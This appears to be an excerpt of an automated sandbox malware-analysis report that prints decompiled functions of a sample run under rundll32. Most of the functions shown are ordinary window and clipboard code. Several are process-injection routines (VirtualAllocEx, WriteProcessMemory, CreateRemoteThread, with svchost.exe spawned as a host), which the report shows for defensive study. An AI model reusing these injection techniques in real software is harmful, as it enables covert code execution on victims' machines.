					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
						L7:
						goto L14;
					} else {
						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
						if(_v20 == 0) {
							goto L7;
						}
						CloseHandle(_v20);
						return 1;
					}
				}
				return 0;
			}











                          0x042d388a
                          0x042d3930
                          0x042d3937
                          0x042d3996
                          0x00000000
                          0x042d3996
                          0x042d3945
                          0x042d3951
                          0x042d3989
                          0x042d398c
                          0x00000000
                          0x042d398f
                          0x042d396a
                          0x042d3971
                          0x00000000
                          0x042d3984
                          0x042d3977
                          0x00000000
                          0x042d397d
                          0x042d38a2
                          0x042d38c2
                          0x042d38c9
                          0x042d391b
                          0x00000000
                          0x042d38e7
                          0x042d3901
                          0x042d3908
                          0x00000000
                          0x00000000
                          0x042d390e
                          0x00000000
                          0x042d3914
                          0x042d38c9
                          0x00000000

                          APIs
                          • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,042D1FB7), ref: 042D38BC
                          • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,042D1FB7), ref: 042D38DD
                          • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 042D38FB
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,042D1FB7), ref: 042D390E
                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,042D1FB7), ref: 042D392A
                          • CreateThread.KERNEL32(00000000,00000000,042D39E0,00000000,00000000,00000000), ref: 042D3964
                          • CloseHandle.KERNEL32(00000000), ref: 042D3977
                            • Part of subcall function 042D2C40: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 042D2C71
                            • Part of subcall function 042D2C40: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 042D2C83
                            • Part of subcall function 042D2C40: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 042D2CA9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                          • String ID:
                          • API String ID: 2742758278-0
                          • Opcode ID: 7988e2d117c1f50fc4d748b8b23e5dcd3423774fc7ee508de15149581da7d1eb
                          • Instruction ID: d7efce650a9d2f9964a28f439525f6017daf3ad7d3889c158108f5ef2a9e86d2
                          • Opcode Fuzzy Hash: 7988e2d117c1f50fc4d748b8b23e5dcd3423774fc7ee508de15149581da7d1eb
                          • Instruction Fuzzy Hash: 03315075B14209FBDB14DFA4D849FEE77B8EB48701F108518FA05A7284E3B5AA40CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281DFFC Relevance: 9.1, APIs: 6, Instructions: 107windownativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 38%
                          			E0281DFFC(int __eax) {
				int _v8;
				void* __ecx;
				int _t45;
				intOrPtr* _t53;
				signed int _t56;
				intOrPtr* _t57;
				int _t60;
				intOrPtr _t67;
				intOrPtr _t70;
				void* _t94;
				int _t102;

				_v8 = __eax;
				_t45 = IsIconic( *(_v8 + 0x30));
				if(_t45 != 0) {
					SetActiveWindow( *(_v8 + 0x30));
					if( *((intOrPtr*)(_v8 + 0x44)) == 0 ||  *((char*)(_v8 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x57)) == 0) {
						L6:
						E0281CC34( *(_v8 + 0x30), 9);
					} else {
						_t102 = IsWindowEnabled(E02833F7C( *((intOrPtr*)(_v8 + 0x44))));
						if(_t102 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_v8 + 0x30));
							L027D6A3C();
						}
					}
					_t53 =  *0x2864444; // 0x2865890
					_t56 =  *((intOrPtr*)( *_t53))(1, 0, 0, 0x40) >> 1;
					if(_t102 < 0) {
						asm("adc eax, 0x0");
					}
					_t57 =  *0x2864444; // 0x2865890
					_t60 =  *((intOrPtr*)( *_t57))(0, _t56) >> 1;
					if(_t102 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_v8 + 0x30), 0, _t60, ??, ??, ??, ??);
					if( *((intOrPtr*)(_v8 + 0x44)) != 0 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x22b)) == 1 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x57)) == 0) {
						E028178BC( *((intOrPtr*)(_v8 + 0x44)), 0);
						E0281A51C( *((intOrPtr*)(_v8 + 0x44)));
					}
					E0281D530(_v8, _t94);
					_t67 =  *0x2865b5c; // 0x41d1150
					if( *((intOrPtr*)(_t67 + 0x64)) != 0) {
						_t70 =  *0x2865b5c; // 0x41d1150
						_t35 = _t70 + 0x64; // 0x0
						SetFocus(E02833F7C( *_t35));
					}
					_t45 = _v8;
					if( *((short*)(_t45 + 0x122)) != 0) {
						return  *((intOrPtr*)(_v8 + 0x120))();
					}
				}
				return _t45;
			}














                          0x0281e001
                          0x0281e00b
                          0x0281e012
                          0x0281e01f
                          0x0281e02b
                          0x0281e071
                          0x0281e07c
                          0x0281e042
                          0x0281e053
                          0x0281e055
                          0x00000000
                          0x0281e057
                          0x0281e057
                          0x0281e059
                          0x0281e05e
                          0x0281e069
                          0x0281e06a
                          0x0281e06a
                          0x0281e055
                          0x0281e089
                          0x0281e092
                          0x0281e094
                          0x0281e096
                          0x0281e096
                          0x0281e09c
                          0x0281e0a5
                          0x0281e0a7
                          0x0281e0a9
                          0x0281e0a9
                          0x0281e0b6
                          0x0281e0c2
                          0x0281e0e7
                          0x0281e0f2
                          0x0281e0f2
                          0x0281e0fa
                          0x0281e0ff
                          0x0281e108
                          0x0281e10a
                          0x0281e10f
                          0x0281e118
                          0x0281e118
                          0x0281e11d
                          0x0281e128
                          0x00000000
                          0x0281e136
                          0x0281e128
                          0x0281e13f

                          APIs
                          • IsIconic.USER32(?), ref: 0281E00B
                          • SetActiveWindow.USER32(?,?,?,?,?,0281D998,00000000,0281DE90), ref: 0281E01F
                          • IsWindowEnabled.USER32(00000000), ref: 0281E04E
                          • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,?,0281D998,00000000,0281DE90), ref: 0281E06A
                          • SetWindowPos.USER32(?,00000000,00000000,?,?,?,0281D998,00000000,0281DE90), ref: 0281E0B6
                          • SetFocus.USER32(00000000,?,00000000,00000000,?,?,?,0281D998,00000000,0281DE90), ref: 0281E118
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                          • String ID:
                          • API String ID: 3996302123-0
                          • Opcode ID: 8d972900fa4bb88af96fb4a9fe519991199c08c651ae88206742805a040ed78b
                          • Instruction ID: ca103089319c2a4c31fa946c9e329733f20741829863e5c444f92a85d76522d7
                          • Opcode Fuzzy Hash: 8d972900fa4bb88af96fb4a9fe519991199c08c651ae88206742805a040ed78b
                          • Instruction Fuzzy Hash: A641A678A00144EFDB15EBA9DA89FA977FABB04304F590094E904DB2E2D775EE40DB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028024DC Relevance: 9.1, APIs: 6, Instructions: 82clipboardmemoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E028024DC(void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				void* _v12;
				void* _t32;
				intOrPtr _t42;
				void* _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t56;
				void* _t57;
				intOrPtr _t58;

				_t56 = _t57;
				_t58 = _t57 + 0xfffffff8;
				_v8 = __edx;
				E027D4598(_v8);
				_push(_t56);
				_push(0x280260a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58;
				if(OpenClipboard(0) == 0) {
					_t42 =  *0x2864324; // 0x27f55cc
					E027DBC80(_t42, 1);
					E027D3A9C();
					_pop(_t50);
					 *[fs:eax] = _t50;
					_push(0x2802611);
					return E027D40E8( &_v8);
				} else {
					_push(_t56);
					_push(0x28025d6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t58;
					_v12 = GlobalAlloc(0x2002, E027D43A8(_v8) + 1);
					_push(_t56);
					_push(0x28025ab);
					_push( *[fs:eax]);
					 *[fs:eax] = _t58;
					_t26 = _v12;
					GlobalFix(_v12);
					_push(_t56);
					_push(0x280259a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t58;
					_push(E027D43A8(_v8) + 1);
					_t32 = E027D45A8(_v8);
					_pop(_t45);
					E027D2978(_t32, _t45, _t26);
					EmptyClipboard();
					SetClipboardData(1, _v12);
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(0x28025a1);
					return GlobalUnWire(_v12);
				}
			}













                          0x028024dd
                          0x028024df
                          0x028024e5
                          0x028024eb
                          0x028024f2
                          0x028024f3
                          0x028024f8
                          0x028024fb
                          0x02802507
                          0x028025dd
                          0x028025ea
                          0x028025ef
                          0x028025f6
                          0x028025f9
                          0x028025fc
                          0x02802609
                          0x0280250d
                          0x0280250f
                          0x02802510
                          0x02802515
                          0x02802518
                          0x0280252f
                          0x02802534
                          0x02802535
                          0x0280253a
                          0x0280253d
                          0x02802540
                          0x02802544
                          0x0280254d
                          0x0280254e
                          0x02802553
                          0x02802556
                          0x02802562
                          0x02802566
                          0x0280256d
                          0x0280256e
                          0x02802573
                          0x0280257e
                          0x02802585
                          0x02802588
                          0x0280258b
                          0x02802599
                          0x02802599

                          APIs
                          • OpenClipboard.USER32(00000000), ref: 02802500
                          • GlobalAlloc.KERNEL32(00002002,00000001,00000000,028025D6,?,00000000,0280260A), ref: 0280252A
                          • GlobalFix.KERNEL32(?), ref: 02802544
                          • EmptyClipboard.USER32 ref: 02802573
                          • SetClipboardData.USER32(00000001,?), ref: 0280257E
                          • GlobalUnWire.KERNEL32(?), ref: 02802594
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocDataEmptyOpenWire
                          • String ID:
                          • API String ID: 461592451-0
                          • Opcode ID: 8905d4a0bd54cb6d5b7168b397c47f16bc0287259adee702decd4dd1dcc41093
                          • Instruction ID: 419e6aa0d74d078908d0169a5d05de3d01322361e43ee594c1369550d8c2a866
                          • Opcode Fuzzy Hash: 8905d4a0bd54cb6d5b7168b397c47f16bc0287259adee702decd4dd1dcc41093
                          • Instruction Fuzzy Hash: 8F21B339650704AFF752EBA4DDBAC6DB7BEEB49B00B5204A0F801D3690DA759D10DD24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02816044 Relevance: 9.1, APIs: 6, Instructions: 66windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E02816044(signed int __eax, struct tagRECT* __edx) {
				signed int _v8;
				struct tagRECT* _v12;
				int _t31;
				long _t36;

				_v12 = __edx;
				_v8 = __eax;
				if(IsIconic(E02833F7C(_v8)) == 0) {
					_t31 = E02834044(_v8, _v12);
				} else {
					SetRect(_v12, 0, 0, 0, 0);
					_t36 = GetWindowLongA(E02833F7C(_v8), 0xffffffec);
					_t37 = _v8;
					asm("sbb eax, eax");
					AdjustWindowRectEx(_v12, GetWindowLongA(E02833F7C(_v8), 0xfffffff0),  ~(_v8 & 0xffffff00 |  *((intOrPtr*)(_t37 + 0x248)) != 0x00000000), _t36);
					_t31 = SetRect(_v12, 0, 0,  *((intOrPtr*)(_v8 + 0x48)) - _v12->right + _v12->left,  *((intOrPtr*)(_v8 + 0x4c)) - _v12->bottom + _v12->top);
				}
				return _t31;
			}







                          0x0281604a
                          0x0281604d
                          0x02816060
                          0x028160ee
                          0x02816066
                          0x02816072
                          0x02816082
                          0x02816088
                          0x02816097
                          0x028160af
                          0x028160e1
                          0x028160e1
                          0x028160f6

                          APIs
                          • IsIconic.USER32(00000000), ref: 02816059
                          • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 02816072
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 02816082
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 028160A5
                          • AdjustWindowRectEx.USER32(?,00000000,00000000,000000F0), ref: 028160AF
                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 028160E1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: RectWindow$Long$AdjustIconic
                          • String ID:
                          • API String ID: 1053891045-0
                          • Opcode ID: 247ef2af8b6001099d9ef2821b3924734eb69d5168432f54b3208406840a8ea0
                          • Instruction ID: 708d7662965a3b0ea42cc08d10d91280cf48cc9efd6d9f0cba790b26e471e5ae
                          • Opcode Fuzzy Hash: 247ef2af8b6001099d9ef2821b3924734eb69d5168432f54b3208406840a8ea0
                          • Instruction Fuzzy Hash: 2C21BF78A04204AFDB11EBACCD85F5EBBBAEF44710F204694A504E7295D731FE409B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02833968 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E02833968(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E02834254(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E02834254(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0282D0F0(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0282CD7C(_t52);
						return E027D3408(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                          0x02833971
                          0x02833973
                          0x02833975
                          0x0283397a
                          0x02833995
                          0x0283399e
                          0x028339cc
                          0x028339cc
                          0x028339cf
                          0x028339d5
                          0x028339db
                          0x028339e0
                          0x028339e5
                          0x028339e7
                          0x028339e9
                          0x028339fb
                          0x02833a05
                          0x02833a10
                          0x02833a11
                          0x02833a12
                          0x02833a13
                          0x02833a1f
                          0x02833a1f
                          0x02833a24
                          0x02833a26
                          0x00000000
                          0x02833a31
                          0x028339a7
                          0x028339ac
                          0x028339ae
                          0x00000000
                          0x00000000
                          0x028339c5
                          0x00000000
                          0x02833989
                          0x02833989
                          0x0283398f
                          0x02833a3c
                          0x02833a3c
                          0x00000000
                          0x0283398f

                          APIs
                          • IsIconic.USER32(?), ref: 028339A7
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 028339C5
                          • GetWindowPlacement.USER32(?,0000002C), ref: 028339FB
                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 02833A1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Placement$Iconic
                          • String ID: ,
                          • API String ID: 568898626-3772416878
                          • Opcode ID: bc98a04fb28be80d521ac24672d837a924363fcb3188a37bd44da4447f58b5ef
                          • Instruction ID: 7b85010ebd394fa208e2e0f12135ce4af11839a85f8c87e4dc3b0c3ba4ca39b3
                          • Opcode Fuzzy Hash: bc98a04fb28be80d521ac24672d837a924363fcb3188a37bd44da4447f58b5ef
                          • Instruction Fuzzy Hash: 70213179600208ABCF55EF6DD8C4A9AB7A9AF49310F0484A5FD18EF205D771E9098BE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281DF10 Relevance: 7.6, APIs: 5, Instructions: 79nativewindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E0281DF10(int __eax) {
				int _v8;
				int _t42;

				_v8 = __eax;
				_t42 = IsIconic( *(_v8 + 0x30));
				if(_t42 == 0) {
					E0281D508(_v8);
					SetActiveWindow( *(_v8 + 0x30));
					if( *((intOrPtr*)(_v8 + 0x44)) == 0 ||  *((char*)(_v8 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E02833F7C( *((intOrPtr*)(_v8 + 0x44)))) == 0) {
						E0281CC34( *(_v8 + 0x30), 6);
					} else {
						SetWindowPos( *(_v8 + 0x30), E02833F7C( *((intOrPtr*)(_v8 + 0x44))),  *( *((intOrPtr*)(_v8 + 0x44)) + 0x40),  *( *((intOrPtr*)(_v8 + 0x44)) + 0x44),  *( *((intOrPtr*)(_v8 + 0x44)) + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_push( *(_v8 + 0x30));
						L027D6A3C();
					}
					_t42 = _v8;
					if( *((short*)(_t42 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_v8 + 0x118))();
					}
				}
				return _t42;
			}





                          0x0281df15
                          0x0281df1f
                          0x0281df26
                          0x0281df2f
                          0x0281df3b
                          0x0281df47
                          0x0281dfd2
                          0x0281df73
                          0x0281dfa8
                          0x0281dfad
                          0x0281dfaf
                          0x0281dfb4
                          0x0281dfbf
                          0x0281dfc0
                          0x0281dfc0
                          0x0281dfd7
                          0x0281dfe2
                          0x00000000
                          0x0281dff0
                          0x0281dfe2
                          0x0281dff9

                          APIs
                          • IsIconic.USER32(?), ref: 0281DF1F
                          • SetActiveWindow.USER32(?,?,?,?,?,0281D98B,00000000,0281DE90), ref: 0281DF3B
                          • IsWindowEnabled.USER32(00000000), ref: 0281DF6A
                          • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?,?,0281D98B,00000000,0281DE90), ref: 0281DFA8
                          • NtdllDefWindowProc_A.USER32(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?), ref: 0281DFC0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnabledIconicNtdllProc_
                          • String ID:
                          • API String ID: 1720852555-0
                          • Opcode ID: f421e66d52269b6831d7aeeda1a22f636f567e25cd1fcfff66484c3c0d4dd0df
                          • Instruction ID: 42a672f56e10d4fc6d54e24004c60b60cd01d7cf7fab481dd39ad2db50458824
                          • Opcode Fuzzy Hash: f421e66d52269b6831d7aeeda1a22f636f567e25cd1fcfff66484c3c0d4dd0df
                          • Instruction Fuzzy Hash: 57317179A00248EFDB10EB99CA85F9D77F9AF08304F550094FA04EB6A2D731EE40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F4DD4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E027F4DD4(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x28658b9 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E027F4D44( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x2865894; // 0x27f4dd4
				 *0x2865894 = E027F4BD4(1, _t19, _t21, __edi, _t23);
				return  *0x2865894(_t23, _t19);
			}










                          0x027f4ddc
                          0x027f4ddf
                          0x027f4de9
                          0x027f4e13
                          0x027f4e24
                          0x027f4e37
                          0x027f4e26
                          0x027f4e2b
                          0x027f4e2b
                          0x00000000
                          0x027f4e41
                          0x00000000
                          0x027f4e15
                          0x027f4df0
                          0x027f4dfd
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID: MonitorFromWindow
                          • API String ID: 190572456-2842599566
                          • Opcode ID: 40d73e43e6ae5f6d38a23b05a07b29c7d0fde8099d20e7940c29dc47e6907646
                          • Instruction ID: 172868959f19303feeaf9b9b1df358ee6c1a887d01632512e06eaf698419d1d9
                          • Opcode Fuzzy Hash: 40d73e43e6ae5f6d38a23b05a07b29c7d0fde8099d20e7940c29dc47e6907646
                          • Instruction Fuzzy Hash: 4201F93694D0085BD741EBA49C989FF77ADEB05210F440411EB2497340E7389D1187A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D3270 Relevance: 6.1, APIs: 4, Instructions: 113memoryinjectionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E042D3270(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				void* _t57;
				void* _t59;
				void* _t92;
				void* _t93;

				_t3 = _a8 + 0x3c; // 0xf445c7f8
				_v24 = _a8 +  *_t3;
				_v16 =  *((intOrPtr*)(_v24 + 0x34));
				_v20 =  *((intOrPtr*)(_v24 + 0x50));
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				while(1) {
					_v8 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40);
					if(_v8 == 0) {
						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
						_v16 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_t57 = E042D1390(_v20);
					_t93 = _t92 + 4;
					_v12 = _t57;
					if(_v12 != 0) {
						_t59 = E042D3A00(_a8, _a12, _v12, _v16);
						_t92 = _t93 + 0x10;
						if(_t59 == 0) {
						} else {
							if(_a16 != 0) {
								 *_a16 = _v16;
							}
							if(_a20 != 0) {
								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
							}
							if(WriteProcessMemory(_a4, _v8, _v12, _v20, 0) != 0) {
								_v28 = 1;
								if(0 != 0) {
									continue;
								}
							} else {
							}
						}
					} else {
					}
					L17:
					if(_v12 != 0) {
						E042D13D0(_v12);
					}
					if(_v8 != 0 && _v28 == 0) {
						VirtualFreeEx(_a4, _v8, 0, 0x8000);
					}
					return _v28;
				}
				goto L17;
			}













                          0x042d327c
                          0x042d327f
                          0x042d3288
                          0x042d3291
                          0x042d3294
                          0x042d329b
                          0x042d32a2
                          0x042d32a9
                          0x042d32c2
                          0x042d32c9
                          0x042d32e2
                          0x042d32e8
                          0x042d32e8
                          0x042d32ef
                          0x00000000
                          0x00000000
                          0x042d32fa
                          0x042d32ff
                          0x042d3302
                          0x042d3309
                          0x042d331d
                          0x042d3322
                          0x042d3327
                          0x042d3329
                          0x042d332d
                          0x042d3335
                          0x042d3335
                          0x042d333b
                          0x042d3349
                          0x042d3349
                          0x042d3369
                          0x042d336d
                          0x042d3376
                          0x00000000
                          0x00000000
                          0x00000000
                          0x042d336b
                          0x042d3369
                          0x00000000
                          0x042d330b
                          0x042d337c
                          0x042d3380
                          0x042d3386
                          0x042d338b
                          0x042d3392
                          0x042d33a9
                          0x042d33a9
                          0x042d33b5
                          0x042d33b5
                          0x00000000

                          APIs
                          • VirtualAllocEx.KERNEL32(00000000,042D1ECF,FFFFFFFF,00003000,00000040), ref: 042D32BC
                          • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 042D32DC
                            • Part of subcall function 042D1390: GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                            • Part of subcall function 042D1390: RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                          • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 042D3361
                          • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 042D33A9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                          • String ID:
                          • API String ID: 2713107948-0
                          • Opcode ID: a96fce48b5e58bb261da5f505809a0d7c0cbdad14f3dff1fb9097bdab219b272
                          • Instruction ID: 848ea00ec95acbb7589d2e58e7101f2c15e03a5531a0a26115d3350cbfae4ec1
                          • Opcode Fuzzy Hash: a96fce48b5e58bb261da5f505809a0d7c0cbdad14f3dff1fb9097bdab219b272
                          • Instruction Fuzzy Hash: 4F410AB5F10209EFDB54DF98D984BAEBBB5FF48304F108158E905A7380DB74AA40CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02818CFC Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02818CFC(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				signed short _t37;
				signed int _t41;
				signed short _t43;

				_v12 = __edx;
				_v8 = __eax;
				if(IsIconic(E02833F7C(_v8)) != 0) {
					_v16 = BeginPaint(E02833F7C(_v8),  &_v80);
					DrawIcon(_v16, 0, 0, E02818B60(_v8));
					return EndPaint(E02833F7C(_v8),  &_v80);
				}
				_t37 =  *0x2818d94; // 0x100
				 *(_v8 + 0x54) = _t37 |  *(_v8 + 0x54);
				E0283210C(_v8, _v12);
				_t41 =  *0x2818d94; // 0x100
				_t43 =  !_t41 &  *(_v8 + 0x54);
				 *(_v8 + 0x54) = _t43;
				return _t43;
			}










